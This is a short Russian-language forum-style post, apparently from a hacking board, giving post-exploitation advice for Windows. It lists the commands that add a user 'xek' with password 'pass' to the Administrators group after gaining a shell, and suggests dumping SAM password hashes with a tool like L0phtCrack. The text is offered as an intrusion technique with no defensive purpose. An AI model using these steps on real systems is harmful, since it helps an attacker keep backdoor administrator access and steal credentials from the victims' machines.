После получения шелла вбивай в нём:
net user xek pass /add
net localgroup Administrators xek /add
(или Администраторы, если винда русская)

это создаст тебе юзера xek с паролем pass и админскими правами.


Это путь дзен в windows privelege escalation, в работающей системе ты sam не скопируешь, вроде только неактуальный из repair. Или под админом можешь тулзой типа lopht дернуть содержимое.